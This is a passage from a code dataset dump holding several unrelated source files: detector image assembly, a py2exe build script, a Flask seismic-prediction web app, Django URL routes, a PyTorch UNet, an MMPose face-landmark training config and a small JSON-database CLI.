data3d[i], 2)\n gap = np.zeros( (185,4), dtype=data3d.dtype )\n #gap = gap * -99\n pair = np.hstack( (asics[0], gap, asics[1]) )\n\n \n # sections 2,3 and 6,7 are as is. 
The others need some rotation:\n if i==0 or i==1 :\n pair = pair[:,::-1].T\n if i==4 or i==5 :\n pair = pair[::-1,:].T\n\n pairs.append( pair )\n\n\n # make the array for this quadrant\n quadrant = np.zeros( (self.npix_quad, self.npix_quad), dtype=data3d.dtype )\n #quadrant = quadrant * -99\n\n # insert the 2x1 sections according to\n for sec in range (8):\n nrows, ncols = pairs[sec].shape\n\n # x,y in quadrant coordinate system\n xpos = self.xpos_sec2x1[qn][sec]\n ypos = self.ypos_sec2x1[qn][sec]\n colp = xpos\n rowp = self.npix_quad-ypos\n\n quadrant[rowp-nrows:rowp, colp:colp+ncols] = pairs[sec][0:nrows,0:ncols]\n\n\n # Finally, rotate the quadrant as needed\n if qn>0 : quadrant = np.rot90( quadrant, 4-qn)\n return quadrant\n\n\n\n def CsPadElementUnaligned( self, data3d, qn ):\n # Construct one image for each quadrant, each with 8 sections\n # from a data3d = 3 x 2*194 x 185 data array\n # +---+---+-------+\n # | | | 6 |\n # + 5 | 4 +-------+\n # | | | 7 |\n # +---+---+---+---+\n # | 2 | | |\n # +-------+ 0 | 1 |\n # | 3 | | |\n # +-------+---+---+\n\n zeros = np.zeros((18,388),dtype=data3d.dtype)\n zeros9 = np.zeros((9,388),dtype=data3d.dtype)\n zeros6 = np.zeros((6,388),dtype=data3d.dtype)\n\n # if any sections are missing, insert zeros\n if len( data3d ) < 8 :\n zsec = np.zeros( (185,388), dtype=data3d.dtype)\n for i in range (8) :\n if i not in self.sections[qn] :\n data3d = np.insert( data3d, i, zsec, axis=0 )\n #print \"section \", i\n #print data3d[i]\n\n\n s01 = np.concatenate( (zeros6.T,\n data3d[0][:,::-1].T,\n zeros6.T,\n data3d[1][:,::-1].T,\n zeros6.T),\n 1)\n s23 = np.concatenate( (zeros6,\n data3d[2], \n zeros6,\n data3d[3],\n zeros6 ),\n 0 )\n s45 = np.concatenate( (zeros6.T,\n data3d[5][::-1,:].T,\n zeros6.T,\n data3d[4][::-1,:].T,\n zeros6.T), \n 1 )\n s67 = np.concatenate( (zeros6,\n data3d[6], \n zeros6,\n data3d[7],\n zeros6 ),\n 0 )\n\n m1 = np.hstack( (s23, s01) )\n m2 = np.hstack( (s45, s67) )\n e0 = np.vstack( (m2, m1) )\n\n if qn>0 : e0 = np.rot90( e0, 4-qn)\n return e0\n\n","sub_path":"XtcExplorer/tags/V00-00-14/src/cspad.py","file_name":"cspad.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"574278780","text":"__author__ = \"Rustam Safin\"\nimport os\nimport sys\n\nfrom distutils.core import setup\nfrom distutils.dir_util import copy_tree\nfrom py2exe.build_exe import py2exe\nimport glob\nimport zlib\nimport shutil\nimport time\nimport pyface\nimport enable\nimport test\n\ndistDir = \"build\"\n\n# Remove the build folder\nshutil.rmtree(\"build\", ignore_errors=True)\n\n\nclass Target(object):\n \"\"\" A simple class that holds information on our executable file. \"\"\"\n def __init__(self, **kw):\n \"\"\" Default class constructor. Update as you need. 
\"\"\"\n self.__dict__.update(kw)\n\ndef copyPackage (pkg, name, dist) :\n p = os.path.join (dist, name)\n copy_tree (pkg.__path__[0], p)\n\ncopyPackage (enable, \"enable\", distDir)\ncopyPackage (pyface, \"pyface\", distDir)\nincludes = ['sip', 'PyQt4.Qt', 'uuid', 'test']\nexcludes = ['_gtkagg', '_tkagg', 'bsddb', 'curses', 'email', 'pywin.debugger',\n 'pywin.debugger.dbgcon', 'pywin.dialogs', 'tcl',\n 'Tkconstants', 'Tkinter', 'tvtk', 'mayavi']\npackages = ['pyface', 'enable', 'chaco']\ndll_excludes = ['libgdk-win32-2.0-0.dll', 'libgobject-2.0-0.dll', 'tcl84.dll',\n 'tk84.dll']\ndata_files = []\nicon_resources = []\nbitmap_resources = []\nother_resources = []\n\n\nGUI2Exe_Target_1 = Target(\n # what to build\n script=\"main.py\",\n icon_resources=icon_resources,\n bitmap_resources=bitmap_resources,\n other_resources=other_resources,\n dest_base=\"main\",\n version=\"0.1\",\n company_name=\"MiT-Ufa\",\n copyright=\"Rustam Safin\",\n name=\"OmniBackupGantt\")\n\nsetup(\n data_files=data_files,\n options={\"py2exe\": {\"compressed\": 0,\n \"optimize\": 0,\n \"includes\": includes,\n \"excludes\": excludes,\n \"packages\": packages,\n \"dll_excludes\": dll_excludes,\n \"bundle_files\": 3,\n \"dist_dir\": distDir,\n \"xref\": False,\n \"skip_archive\": True,\n \"ascii\": False,\n \"custom_boot_script\": ''}},\n\n zipfile=r'library.zip',\n console=[],\n windows=[GUI2Exe_Target_1],\n service=[],\n com_server=[],\n ctypes_com_server=[])\n","sub_path":"src/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"280219867","text":"from PIL import Image\r\nimport socket\r\nimport os\r\nfrom flask import Flask, render_template, request, session, flash\r\nfrom pre import pre_process_me\r\nfrom datetime import timedelta\r\nfrom model_predict import predict_me\r\napp = Flask(__name__)\r\napp.secret_key = b'some_secret'\r\nUPLOAD_FOLDER = os.path.basename('uploads')\r\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\r\nMASK_FOLDER = os.path.basename('masks')\r\napp.config['MASK_FOLDER'] = MASK_FOLDER\r\n\r\n# TODO:\r\n# MASK UPLOAD IN WEBSITE, PREDICT BUTTON\r\n# MODEL model-tgs-salt-2.h5\r\n\r\n\r\n@app.before_request\r\ndef make_session_active():\r\n session.modified = True\r\n\r\n\r\n@app.before_request\r\ndef make_session_permanent():\r\n session.permanent = True\r\n app.permanent_session_lifetime = timedelta(minutes=300)\r\n\r\n\r\n@app.route('/')\r\ndef hello_world():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/')\r\ndef default_access():\r\n return render_template(\"index.html\")\r\n\r\n\r\n@app.route('/', methods=['POST'])\r\ndef home_page():\r\n if request.method == 'POST':\r\n if request.args.get('type') == \"upload_me\":\r\n if get_image() and get_thres():\r\n flash(\"Upload Success\")\r\n else:\r\n flash(\"Upload Failed\")\r\n\r\n return render_template(\"index.html\")\r\n\r\n\r\n@app.route('/predict', methods=['GET', 'POST'])\r\ndef predicts_me():\r\n if 'thres' in session and 'image_file_name' in session:\r\n X, X_feat = pre_process_me(session['image_file_name'])\r\n #call in model and predict\r\n salt_prop, mask_graph, scats = predict_me(X, X_feat, \"0cc1d0e4c4.png\", session['thres'])\r\n flash('Plot Me')\r\n print(salt_prop, mask_graph)\r\n return render_template(\"index.html\", salt_prop=salt_prop, mask_graph=mask_graph, plots=scats)\r\n else:\r\n flash(\"Please Upload Seismic Image and Threshold Value\")\r\n return 
render_template(\"index.html\")\r\n return render_template(\"index.html\")\r\n\r\n\r\ndef get_thres():\r\n try:\r\n thres = request.form['Thres']\r\n session['thres'] = int(thres)\r\n print(session)\r\n return True\r\n except Exception as e:\r\n return False\r\n\r\n\r\ndef get_image():\r\n file = request.files['Simage']\r\n f = os.path.join(app.config['UPLOAD_FOLDER'], file.filename)\r\n file.save(f)\r\n flag = False\r\n try:\r\n im = Image.open(f)\r\n flag = True\r\n session['image_file_name'] = file.filename.split(\".\")[0] + \".PNG\"\r\n except IOError as e:\r\n os.remove(f)\r\n im.thumbnail((101, 101))\r\n im.save(os.path.join(app.config['UPLOAD_FOLDER'], file.filename.split(\".\")[0] + \".PNG\"))\r\n del im\r\n return flag\r\n\r\n\r\ndef get_mask():\r\n file = request.files['mask']\r\n f = os.path.join(app.config['MASK_FOLDER'], file.filename)\r\n file.save(f)\r\n flag = False\r\n try:\r\n im = Image.open(f)\r\n flag = True\r\n session['mask_file_name'] = file.filename.split(\".\")[0] + \".PNG\"\r\n except IOError as e:\r\n os.remove(f)\r\n im.thumbnail((101, 101))\r\n im.save(os.path.join(app.config['MASK_FOLDER'], file.filename.split(\".\")[0] + \".PNG\"))\r\n del im\r\n return flag\r\n\r\n\r\n","sub_path":"Code/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"637650622","text":"from django.urls import path\nfrom django.views.generic import TemplateView\nfrom .views import index, feedbackView,user_login, signup, user_logout, login_success, profile_view\nfrom . import views\n\napp_name = 'portfolio'\nurlpatterns = [\n path('', index.as_view(), name='index'),\n path('feedback/', feedbackView.as_view(), name='feedback'),\n path('feedback/index/', index.as_view(), name='index'),\n path('signup/', signup, name='signup'),\n path('signup/account/', login_success , name='signup_success'),\n path('login/', user_login, name='login'),\n path('login/account/', login_success , name='login_success'),\n path('account/', profile_view.as_view() , name='account'),\n #path('login/account/', profile_view.as_view() , name='account'),\n #path('login/account/', login_success , name='login_success'),\n #path('account/', user_logout, name='logout'),\n #path('account/login', user_login, name='login'),\n]","sub_path":"portfolio/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"538999156","text":"import torch\r\nimport torch.nn as nn\r\n\r\n\r\ndef EncoderBlock(i, o, kernel_size=(3, 3), stride=1, padding=1, bn=True):\r\n layers = [nn.Conv2d(i, o, kernel_size=kernel_size, stride=stride, padding=padding, bias=not bn)]\r\n if bn:\r\n layers += [nn.BatchNorm2d(o)]\r\n layers += [nn.ReLU(inplace=True)]\r\n\r\n layers += [nn.Conv2d(o, o, kernel_size=kernel_size,\r\n stride=stride, padding=padding, bias=not bn)]\r\n if bn:\r\n layers += [nn.BatchNorm2d(o)]\r\n layers += [nn.ReLU(inplace=True)]\r\n\r\n return nn.Sequential(*layers)\r\n\r\n\r\ndef DecoderBlock(i, o, kernel_size=(3, 3), stride=1, padding=1, bn=True):\r\n layers = [nn.Conv2d(i, o*2, kernel_size=kernel_size,\r\n stride=stride, padding=padding, bias=not bn)]\r\n if bn:\r\n layers += [nn.BatchNorm2d(o*2)]\r\n layers += [nn.ReLU(inplace=True)]\r\n\r\n layers += [nn.Conv2d(o*2, o*2, kernel_size=kernel_size,\r\n stride=stride, padding=padding, bias=not bn)]\r\n if bn:\r\n layers += [nn.BatchNorm2d(o*2)]\r\n layers 
+= [nn.ReLU(inplace=True)]\r\n\r\n layers += [nn.ConvTranspose2d(o*2, o, kernel_size=2, stride=2)]\r\n return nn.Sequential(*layers)\r\n\r\n\r\nclass UNet(nn.Module):\r\n def __init__(self):\r\n super(UNet, self).__init__()\r\n self.enc_1 = EncoderBlock(3, 64)\r\n self.pool_1 = nn.MaxPool2d(2)\r\n self.enc_2 = EncoderBlock(64, 128)\r\n self.pool_2 = nn.MaxPool2d(2)\r\n self.enc_3 = EncoderBlock(128, 256)\r\n self.pool_3 = nn.MaxPool2d(2)\r\n self.enc_4 = EncoderBlock(256, 512)\r\n self.pool_4 = nn.MaxPool2d(2)\r\n\r\n self.dec_4 = DecoderBlock(512, 512)\r\n self.dec_3 = DecoderBlock(1024, 256)\r\n self.dec_2 = DecoderBlock(512, 128)\r\n self.dec_1 = DecoderBlock(256, 64)\r\n self.final = nn.Sequential(\r\n nn.Conv2d(128, 64, kernel_size=(3, 3), padding=1, bias=False),\r\n nn.BatchNorm2d(64),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(64, 64, kernel_size=(3, 3), padding=1, bias=False),\r\n nn.BatchNorm2d(64),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(64, 2, kernel_size=(1, 1)),\r\n )\r\n\r\n def forward(self, x):\r\n enc1 = self.enc_1(x)\r\n enc2 = self.enc_2(self.pool_1(enc1))\r\n enc3 = self.enc_3(self.pool_2(enc2))\r\n enc4 = self.enc_4(self.pool_3(enc3))\r\n dec4 = self.dec_4(self.pool_4(enc4))\r\n dec3 = self.dec_3(torch.cat((dec4, enc4), dim=1))\r\n dec2 = self.dec_2(torch.cat((dec3, enc3), dim=1))\r\n dec1 = self.dec_1(torch.cat((dec2, enc2), dim=1))\r\n out = self.final(torch.cat((dec1, enc1), dim=1))\r\n return out\r\n","sub_path":"models/unet.py","file_name":"unet.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"636421598","text":"_base_ = ['../../../_base_/default_runtime.py']\n\n# lapa coco wflw 300w cofw halpe\n\n# runtime\nmax_epochs = 120\nstage2_num_epochs = 10\nbase_lr = 4e-3\n\ntrain_cfg = dict(max_epochs=max_epochs, val_interval=1)\nrandomness = dict(seed=21)\n\n# optimizer\noptim_wrapper = dict(\n type='OptimWrapper',\n optimizer=dict(type='AdamW', lr=base_lr, weight_decay=0.05),\n clip_grad=dict(max_norm=35, norm_type=2),\n paramwise_cfg=dict(\n norm_decay_mult=0, bias_decay_mult=0, bypass_duplicate=True))\n\n# learning rate\nparam_scheduler = [\n dict(\n type='LinearLR',\n start_factor=1.0e-5,\n by_epoch=False,\n begin=0,\n end=1000),\n dict(\n type='CosineAnnealingLR',\n eta_min=base_lr * 0.005,\n begin=30,\n end=max_epochs,\n T_max=max_epochs - 30,\n by_epoch=True,\n convert_to_iter_based=True),\n]\n\n# automatically scaling LR based on the actual training batch size\nauto_scale_lr = dict(base_batch_size=512)\n\n# codec settings\ncodec = dict(\n type='SimCCLabel',\n input_size=(256, 256),\n sigma=(5.66, 5.66),\n simcc_split_ratio=2.0,\n normalize=False,\n use_dark=False)\n\n# model settings\nmodel = dict(\n type='TopdownPoseEstimator',\n data_preprocessor=dict(\n type='PoseDataPreprocessor',\n mean=[123.675, 116.28, 103.53],\n std=[58.395, 57.12, 57.375],\n bgr_to_rgb=True),\n backbone=dict(\n _scope_='mmdet',\n type='CSPNeXt',\n arch='P5',\n expand_ratio=0.5,\n deepen_factor=0.67,\n widen_factor=0.75,\n out_indices=(4, ),\n channel_attention=True,\n norm_cfg=dict(type='SyncBN'),\n act_cfg=dict(type='SiLU'),\n init_cfg=dict(\n type='Pretrained',\n prefix='backbone.',\n checkpoint='https://download.openmmlab.com/mmdetection/v3.0/'\n 'rtmdet/cspnext_rsb_pretrain/cspnext-m_8xb256-rsb-a1-600e_in1k-ecb3bbd9.pth' # noqa\n )),\n head=dict(\n type='RTMCCHead',\n in_channels=768,\n out_channels=106,\n input_size=codec['input_size'],\n in_featuremap_size=tuple([s // 32 for s in 
codec['input_size']]),\n simcc_split_ratio=codec['simcc_split_ratio'],\n final_layer_kernel_size=7,\n gau_cfg=dict(\n hidden_dims=256,\n s=128,\n expansion_factor=2,\n dropout_rate=0.,\n drop_path=0.,\n act_fn='SiLU',\n use_rel_bias=False,\n pos_enc=False),\n loss=dict(\n type='KLDiscretLoss',\n use_target_weight=True,\n beta=10.,\n label_softmax=True),\n decoder=codec),\n test_cfg=dict(flip_test=True, ))\n\n# base dataset settings\ndataset_type = 'LapaDataset'\ndata_mode = 'topdown'\ndata_root = 'data/'\n\nbackend_args = dict(backend='local')\n\n# pipelines\ntrain_pipeline = [\n dict(type='LoadImage', backend_args=backend_args),\n dict(type='GetBBoxCenterScale'),\n dict(type='RandomFlip', direction='horizontal'),\n dict(type='RandomHalfBody'),\n dict(\n type='RandomBBoxTransform', scale_factor=[0.5, 1.5], rotate_factor=80),\n dict(type='TopdownAffine', input_size=codec['input_size']),\n dict(type='mmdet.YOLOXHSVRandomAug'),\n dict(\n type='Albumentation',\n transforms=[\n dict(type='Blur', p=0.2),\n dict(type='MedianBlur', p=0.2),\n dict(\n type='CoarseDropout',\n max_holes=1,\n max_height=0.4,\n max_width=0.4,\n min_holes=1,\n min_height=0.2,\n min_width=0.2,\n p=1.0),\n ]),\n dict(\n type='GenerateTarget',\n encoder=codec,\n use_dataset_keypoint_weights=True),\n dict(type='PackPoseInputs')\n]\nval_pipeline = [\n dict(type='LoadImage', backend_args=backend_args),\n dict(type='GetBBoxCenterScale'),\n dict(type='TopdownAffine', input_size=codec['input_size']),\n dict(type='PackPoseInputs')\n]\n\ntrain_pipeline_stage2 = [\n dict(type='LoadImage', backend_args=backend_args),\n dict(type='GetBBoxCenterScale'),\n dict(type='RandomFlip', direction='horizontal'),\n dict(type='RandomHalfBody'),\n dict(\n type='RandomBBoxTransform',\n shift_factor=0.,\n scale_factor=[0.5, 1.5],\n rotate_factor=80),\n dict(type='TopdownAffine', input_size=codec['input_size']),\n dict(type='mmdet.YOLOXHSVRandomAug'),\n dict(\n type='Albumentation',\n transforms=[\n dict(type='Blur', p=0.1),\n dict(type='MedianBlur', p=0.1),\n dict(\n type='CoarseDropout',\n max_holes=1,\n max_height=0.4,\n max_width=0.4,\n min_holes=1,\n min_height=0.2,\n min_width=0.2,\n p=0.5),\n ]),\n dict(\n type='GenerateTarget',\n encoder=codec,\n use_dataset_keypoint_weights=True),\n dict(type='PackPoseInputs')\n]\n\n# train dataset\ndataset_lapa = dict(\n type=dataset_type,\n data_root=data_root,\n data_mode=data_mode,\n ann_file='LaPa/annotations/lapa_trainval.json',\n data_prefix=dict(img='pose/LaPa/'),\n pipeline=[],\n)\n\nkpt_68_to_106 = [\n #\n (0, 0),\n (1, 2),\n (2, 4),\n (3, 6),\n (4, 8),\n (5, 10),\n (6, 12),\n (7, 14),\n (8, 16),\n (9, 18),\n (10, 20),\n (11, 22),\n (12, 24),\n (13, 26),\n (14, 28),\n (15, 30),\n (16, 32),\n #\n (17, 33),\n (18, 34),\n (19, 35),\n (20, 36),\n (21, 37),\n #\n (22, 42),\n (23, 43),\n (24, 44),\n (25, 45),\n (26, 46),\n #\n (27, 51),\n (28, 52),\n (29, 53),\n (30, 54),\n #\n (31, 58),\n (32, 59),\n (33, 60),\n (34, 61),\n (35, 62),\n #\n (36, 66),\n (39, 70),\n #\n ((37, 38), 68),\n ((40, 41), 72),\n #\n (42, 75),\n (45, 79),\n #\n ((43, 44), 77),\n ((46, 47), 81),\n #\n (48, 84),\n (49, 85),\n (50, 86),\n (51, 87),\n (52, 88),\n (53, 89),\n (54, 90),\n (55, 91),\n (56, 92),\n (57, 93),\n (58, 94),\n (59, 95),\n (60, 96),\n (61, 97),\n (62, 98),\n (63, 99),\n (64, 100),\n (65, 101),\n (66, 102),\n (67, 103)\n]\n\nmapping_halpe = [\n #\n (26, 0),\n (27, 2),\n (28, 4),\n (29, 6),\n (30, 8),\n (31, 10),\n (32, 12),\n (33, 14),\n (34, 16),\n (35, 18),\n (36, 20),\n (37, 22),\n (38, 24),\n (39, 26),\n (40, 
28),\n (41, 30),\n (42, 32),\n #\n (43, 33),\n (44, 34),\n (45, 35),\n (46, 36),\n (47, 37),\n #\n (48, 42),\n (49, 43),\n (50, 44),\n (51, 45),\n (52, 46),\n #\n (53, 51),\n (54, 52),\n (55, 53),\n (56, 54),\n #\n (57, 58),\n (58, 59),\n (59, 60),\n (60, 61),\n (61, 62),\n #\n (62, 66),\n (65, 70),\n #\n ((63, 64), 68),\n ((66, 67), 72),\n #\n (68, 75),\n (71, 79),\n #\n ((69, 70), 77),\n ((72, 73), 81),\n #\n (74, 84),\n (75, 85),\n (76, 86),\n (77, 87),\n (78, 88),\n (79, 89),\n (80, 90),\n (81, 91),\n (82, 92),\n (83, 93),\n (84, 94),\n (85, 95),\n (86, 96),\n (87, 97),\n (88, 98),\n (89, 99),\n (90, 100),\n (91, 101),\n (92, 102),\n (93, 103)\n]\n\nmapping_wflw = [\n #\n (0, 0),\n (1, 1),\n (2, 2),\n (3, 3),\n (4, 4),\n (5, 5),\n (6, 6),\n (7, 7),\n (8, 8),\n (9, 9),\n (10, 10),\n (11, 11),\n (12, 12),\n (13, 13),\n (14, 14),\n (15, 15),\n (16, 16),\n (17, 17),\n (18, 18),\n (19, 19),\n (20, 20),\n (21, 21),\n (22, 22),\n (23, 23),\n (24, 24),\n (25, 25),\n (26, 26),\n (27, 27),\n (28, 28),\n (29, 29),\n (30, 30),\n (31, 31),\n (32, 32),\n #\n (33, 33),\n (34, 34),\n (35, 35),\n (36, 36),\n (37, 37),\n (38, 38),\n (39, 39),\n (40, 40),\n (41, 41),\n #\n (42, 42),\n (43, 43),\n (44, 44),\n (45, 45),\n (46, 46),\n (47, 47),\n (48, 48),\n (49, 49),\n (50, 50),\n #\n (51, 51),\n (52, 52),\n (53, 53),\n (54, 54),\n #\n (55, 58),\n (56, 59),\n (57, 60),\n (58, 61),\n (59, 62),\n #\n (60, 66),\n (61, 67),\n (62, 68),\n (63, 69),\n (64, 70),\n (65, 71),\n (66, 72),\n (67, 73),\n #\n (68, 75),\n (69, 76),\n (70, 77),\n (71, 78),\n (72, 79),\n (73, 80),\n (74, 81),\n (75, 82),\n #\n (76, 84),\n (77, 85),\n (78, 86),\n (79, 87),\n (80, 88),\n (81, 89),\n (82, 90),\n (83, 91),\n (84, 92),\n (85, 93),\n (86, 94),\n (87, 95),\n (88, 96),\n (89, 97),\n (90, 98),\n (91, 99),\n (92, 100),\n (93, 101),\n (94, 102),\n (95, 103),\n #\n (96, 104),\n #\n (97, 105)\n]\n\nmapping_cofw = [\n #\n (0, 33),\n (2, 38),\n (4, 35),\n (5, 40),\n #\n (1, 46),\n (3, 50),\n (6, 44),\n (7, 48),\n #\n (8, 60),\n (10, 64),\n (12, 62),\n (13, 66),\n #\n (9, 72),\n (11, 68),\n (14, 70),\n (15, 74),\n #\n (18, 57),\n (19, 63),\n (20, 54),\n (21, 60),\n #\n (22, 84),\n (23, 90),\n (24, 87),\n (25, 98),\n (26, 102),\n (27, 93),\n #\n (28, 16)\n]\ndataset_coco = dict(\n type='CocoWholeBodyFaceDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='coco/annotations/coco_wholebody_train_v1.0.json',\n data_prefix=dict(img='detection/coco/train2017/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=kpt_68_to_106)\n ],\n)\n\ndataset_wflw = dict(\n type='WFLWDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='wflw/annotations/face_landmarks_wflw_train.json',\n data_prefix=dict(img='pose/WFLW/images/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=mapping_wflw)\n ],\n)\n\ndataset_300w = dict(\n type='Face300WDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='300w/annotations/face_landmarks_300w_train.json',\n data_prefix=dict(img='pose/300w/images/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=kpt_68_to_106)\n ],\n)\n\ndataset_cofw = dict(\n type='COFWDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='cofw/annotations/cofw_train.json',\n data_prefix=dict(img='pose/COFW/images/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=mapping_cofw)\n ],\n)\n\ndataset_halpe = dict(\n type='HalpeDataset',\n data_root=data_root,\n data_mode=data_mode,\n 
ann_file='halpe/annotations/halpe_train_133kpt.json',\n data_prefix=dict(img='pose/Halpe/hico_20160224_det/images/train2015/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=mapping_halpe)\n ],\n)\n\n# data loaders\ntrain_dataloader = dict(\n batch_size=256,\n num_workers=10,\n persistent_workers=True,\n sampler=dict(type='DefaultSampler', shuffle=True),\n dataset=dict(\n type='CombinedDataset',\n metainfo=dict(from_file='configs/_base_/datasets/lapa.py'),\n datasets=[\n dataset_lapa, dataset_coco, dataset_wflw, dataset_300w,\n dataset_cofw, dataset_halpe\n ],\n pipeline=train_pipeline,\n test_mode=False,\n ))\nval_dataloader = dict(\n batch_size=32,\n num_workers=10,\n persistent_workers=True,\n drop_last=False,\n sampler=dict(type='DefaultSampler', shuffle=False, round_up=False),\n dataset=dict(\n type=dataset_type,\n data_root=data_root,\n data_mode=data_mode,\n ann_file='LaPa/annotations/lapa_test.json',\n data_prefix=dict(img='pose/LaPa/'),\n test_mode=True,\n pipeline=val_pipeline,\n ))\n\n# test dataset\nval_lapa = dict(\n type=dataset_type,\n data_root=data_root,\n data_mode=data_mode,\n ann_file='LaPa/annotations/lapa_test.json',\n data_prefix=dict(img='pose/LaPa/'),\n pipeline=[],\n)\n\nval_coco = dict(\n type='CocoWholeBodyFaceDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='coco/annotations/coco_wholebody_val_v1.0.json',\n data_prefix=dict(img='detection/coco/val2017/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=kpt_68_to_106)\n ],\n)\n\nval_wflw = dict(\n type='WFLWDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='wflw/annotations/face_landmarks_wflw_test.json',\n data_prefix=dict(img='pose/WFLW/images/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=mapping_wflw)\n ],\n)\n\nval_300w = dict(\n type='Face300WDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='300w/annotations/face_landmarks_300w_test.json',\n data_prefix=dict(img='pose/300w/images/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=kpt_68_to_106)\n ],\n)\n\nval_cofw = dict(\n type='COFWDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='cofw/annotations/cofw_test.json',\n data_prefix=dict(img='pose/COFW/images/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=mapping_cofw)\n ],\n)\n\nval_halpe = dict(\n type='HalpeDataset',\n data_root=data_root,\n data_mode=data_mode,\n ann_file='halpe/annotations/halpe_val_v1.json',\n data_prefix=dict(img='detection/coco/val2017/'),\n pipeline=[\n dict(\n type='KeypointConverter', num_keypoints=106, mapping=mapping_halpe)\n ],\n)\n\ntest_dataloader = dict(\n batch_size=32,\n num_workers=10,\n persistent_workers=True,\n drop_last=False,\n sampler=dict(type='DefaultSampler', shuffle=False, round_up=False),\n dataset=dict(\n type='CombinedDataset',\n metainfo=dict(from_file='configs/_base_/datasets/lapa.py'),\n datasets=[val_lapa, val_coco, val_wflw, val_300w, val_cofw, val_halpe],\n pipeline=val_pipeline,\n test_mode=True,\n ))\n\n# hooks\ndefault_hooks = dict(\n checkpoint=dict(\n save_best='NME', rule='less', max_keep_ckpts=1, interval=1))\n\ncustom_hooks = [\n dict(\n type='EMAHook',\n ema_type='ExpMomentumEMA',\n momentum=0.0002,\n update_buffers=True,\n priority=49),\n dict(\n type='mmdet.PipelineSwitchHook',\n switch_epoch=max_epochs - stage2_num_epochs,\n switch_pipeline=train_pipeline_stage2)\n]\n\n# evaluators\nval_evaluator = dict(\n type='NME',\n 
norm_mode='keypoint_distance',\n)\ntest_evaluator = val_evaluator\n","sub_path":"configs/face_2d_keypoint/rtmpose/face6/rtmpose-m_8xb256-120e_face6-256x256.py","file_name":"rtmpose-m_8xb256-120e_face6-256x256.py","file_ext":"py","file_size_in_byte":14494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"599413306","text":"import csv\nimport json\nimport os\nfrom pathlib import Path\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\n\nimport fire\nfrom beautifultable import BeautifulTable\n\nfrom pysondb.core.db import getDb\n\n\ndef create_if_not_exist(file_name: str) -> None:\n \"\"\"\n Checks for the existence of the provided JSON DB.\n If it does not exist, this will create it with an empty JSON object.\n :param str file_name: The absolute path to the DB file\n \"\"\"\n if not os.path.exists(file_name):\n with open(file_name, \"w\") as db_file:\n db: Dict[str, Any] = {}\n json.dump(db, db_file)\n print(\"Successfully created {} in the directory.\".format(file_name))\n\n\ndef display(file_name: str) -> None:\n\n if file_name.endswith(\".json\") and Path(file_name).is_file() is True:\n\n table = BeautifulTable()\n with open(file_name) as jsondoc:\n data = json.load(jsondoc)\n if data:\n header = [\"id\"] + list(list(data.values())[0].keys())\n for _id, data in data.items():\n table.rows.append([_id] + list(data.values()))\n table.columns.header = header\n print(table)\n\n\ndef delete(file_name: str) -> None:\n if Path(file_name).is_file() is True and file_name.endswith(\".json\"):\n x = input(\"Do you want to remove the json file..(y/n)\")\n if x.lower() == \"y\":\n os.remove(file_name)\n else:\n print(\"Action terminated\")\n else:\n print(\"The file does not exist\")\n\n\ndef convert(csv_file: str, json_db: str) -> None:\n if csv_file.endswith(\".csv\") and Path(csv_file).is_file() is True:\n with open(csv_file, \"r\") as f:\n reader = csv.DictReader(f)\n\n a = getDb(json_db)\n a.addMany([i for i in reader])\n\n\ndef convert_db_to_csv(db: str, targetcsv: str = \"converted.csv\") -> None:\n \"\"\"\n Converts a JSON database to a csv.\n :param str db: path of the target json file\n :param str targetcsv: path of the converted csv ,default : converted.csv\n \"\"\"\n if db.endswith(\".json\") and Path(db).is_file() is True:\n a = getDb(db)\n dict_data = a.getAll()\n data: List[Any] = [dict_data[i] for i in dict_data]\n headers = data[0].keys()\n\n with open(targetcsv, \"w\", newline=\"\") as f:\n dict_writer: Any = csv.DictWriter(f, headers)\n dict_writer.writeheader()\n dict_writer.writerows(data)\n\n\ndef merge(p_file: str, m_file: str, output_file: Optional[str] = None) -> None:\n \"\"\"\n Merges two json DB with the same schema\n :param str p_file: The primary file\n :param str m_file: The file to combine with p_file\n :param str output_file: The name of the output file, default: p_file\n \"\"\"\n\n def verify_file(\n file_data: Dict[str, Dict[str, Any]], refer_keys: List[str], filename: str\n ) -> None:\n for d in file_data:\n temp_keys = list(file_data[d].keys())\n temp_keys.sort()\n if not temp_keys == refer_keys:\n print(f\"Irregularities in key names in database {filename!r}\")\n quit()\n\n o_file = output_file or p_file\n with open(p_file, \"r\") as p, open(m_file) as 